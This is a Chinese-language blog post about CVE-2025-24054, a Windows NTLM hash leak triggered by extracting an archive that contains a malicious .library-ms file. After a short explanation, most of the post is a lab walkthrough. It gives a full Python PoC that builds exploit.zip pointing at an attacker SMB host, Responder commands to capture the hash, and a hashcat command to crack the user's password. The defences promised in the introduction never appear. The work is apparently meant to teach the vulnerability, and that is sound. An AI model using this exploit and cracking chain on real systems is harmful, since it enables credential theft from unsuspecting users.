在数字时代,网络安全已成为我们不得不面对的严峻挑战。最近发现的CVE-2025-24054漏洞,就是一个典型的例子,即使是最日常的操作,如解压一个文件,也可能成为黑客攻击的途径。这个被称为“通过RAR/ZIP解压缩导致的NTLM哈希泄露”的漏洞,利用了Windows文件管理器的自动文件处理机制,使得用户的密码安全岌岌可危。在这篇文章中,我们将深入探讨这一漏洞的原理、影响以及如何防范,以保护您的数字资产不受侵害。
.library-ms
文件时,Windows文件管理器会自动解析其内容以生成预览和索引元数据。当windows解析到恶意.library-ms
文件中的smb url时windows会向恶意主机发起NTLM认证,导致用户口令的NTLM哈希值泄露,攻击者利用爆破工具破解哈希值得到用户口令。.library-ms
文件是Windows操作系统中用于管理和组织文件库的文件。文件库是Windows7及更高版本引入的一项功能,它为用户提供了一种方便的方式来组织和访问分散在不同磁盘位置的文件,而无需用户手动在各个文件夹之间切换查找。例如,用户可以把D盘和E盘的图片文件夹都添加到“图片”文件库中。.library-ms
文件会记录这些文件来源的路径信息,让用户在资源管理器中通过文件库就能快速访问这些分散的文件,而不用分别去不同的磁盘位置查找。
-
kali: 192.168.23.78
-
windows 10: 192.168.23.134
-
在kali机运行以下命令
sudo responder -I eth0 -v
-
运行poc.py生成恶意压缩包exploit.zip
#poc.pyimport osimport zipfiledefmain(): file_name = input("Enter your file name: ") ip_address = input("Enter IP (EX: 192.168.1.162): ") library_content = f"""<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>\\\\{ip_address}\\shared</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> """ library_file_name = f"{file_name}.library-ms"with open(library_file_name, "w", encoding="utf-8") as f: f.write(library_content)with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf: zipf.write(library_file_name)if os.path.exists(library_file_name): os.remove(library_file_name) print("completed")if __name__ == "__main__": main()
将压缩包迁移至win10虚拟机,右键点击解压:
解压后,windows系统会自动解析.library-ms
中的<url>标签,从而使得windows访问指向kali的smb url,当Windows尝试访问SMB共享时,会自动发起NTLM认证。可以发现responder监听到smb通信流量,并提取其中的关键信息。
-
破解hash获得口令
进入/usr/share/responder/logs
找到获取到的NTML hash
在当前目录下使用hashcat破解hash值:
hashcat -m 5600 SMB-NTLMv2-SSP-192.168.23.134.txt /usr/share/wordlists/rockyou.txt --force
破解得到8913
:
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论